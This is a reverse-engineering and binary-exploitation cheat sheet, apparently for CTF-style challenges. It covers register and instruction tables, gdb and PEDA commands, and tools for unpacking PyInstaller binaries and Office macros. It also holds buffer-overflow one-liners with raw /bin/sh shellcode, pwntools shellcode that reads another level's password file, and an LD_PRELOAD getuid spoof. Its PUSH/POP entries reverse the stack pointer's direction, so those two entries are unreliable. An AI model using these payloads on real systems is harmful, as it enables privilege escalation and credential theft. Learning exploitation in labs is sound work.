| x64 | x32 | What is ? | |:——-:|:———:|————————-| | RAX | EAX | Return Value | | RCX | ECX | Counter (or Fourth Arg) | | RDX | EDX | Third Arg | | RSI | ESI | Second Arg | | RDI | EDI | First Arg of Function | | RSP | ESP | Stack Pointer | | RIP | EIP | Next Instruction | | R8-R11 | r8d-r11d | Scratch register | | R12-R15 | r12d-r15d | Preserved register |
| Operation | Explication | |:———————-|————————-| | MOV size dest,src | dest ← src | | LEA dest,[op] | dest ← addr op | | PUSH op | Increase RSP & Store op | | POP op | Load op & Discrease RSP | | | | | ADD op1,op2 | op1 ← op1 + op2 | | SUB op1,op2 | op1 ← op1 - op2 | | NEG reg | reg ← -reg | | INC reg | reg ← reg + 1 | | DEC reg | reg ← reg - 1 | | | | | AND op1,op2 | op1 ← op1 & op2 | | OR op1,op2 | op1 ← op1 | op2 | | XOR op1,op2 | op1 ← op1 ^ op2 | | | | | CMP op1,op2 | op1 - op2 | | TEST op1,op2 | op1 & op2 | | JMP op | Jump to op |
(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")
(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")
python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"
python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"
b *0x12345678 # Breakpoint
b strcpy # Breakpoint
r # Run program
r < <(echo lol) # Run with pipe
r arg1 arg2 # Run with arg
c # Continue
n # Next operation
set $eax=0x00 # Set variable
info register # Show Register
x/s "string"
x/d 53
x/x 0xff
help x
print $rax
x/10s **(char***)&environ
git clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"
let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
[...parent_elmt.children].forEach(children_elmt => {
result += children_elmt.textContent
result += '\n'
uid_t getuid(void)
return (4242);
gcc -shared -fpic lib.c -o libnike.so -m32
LD_PRELOAD=./libnike.so ./exec
Convert executable into .pyc
git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py exec
Disassembly .pyc (compatible python 3.9.2)
git clone https://github.com/zrax/pycdc
cd pycdc
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassembly
sudo pip3 install oletools
olevba -c file.pptm